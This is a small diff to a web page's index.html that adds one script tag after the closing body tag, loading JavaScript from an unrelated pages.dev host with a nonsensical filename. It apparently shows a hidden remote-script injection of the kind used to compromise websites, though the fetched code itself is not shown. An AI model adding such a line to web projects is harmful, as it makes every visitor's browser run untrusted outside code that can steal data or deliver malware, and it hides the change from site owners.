--- a/index.html
+++ b/index.html
@@ -123,6 +123,7 @@
 			}
 		</script>
 	</body>
+	<script src='https://reserve-cc2.pages.dev/treateAlreflectionsBlogger.js'></script>
 	<script src="RelativeJS-1.0.0.js"></script>
 	<script src="getParam.js"></script>
     <script>
@@ -133,3 +134,4 @@
 		//console.clear();
 	</script>
 </html>
+
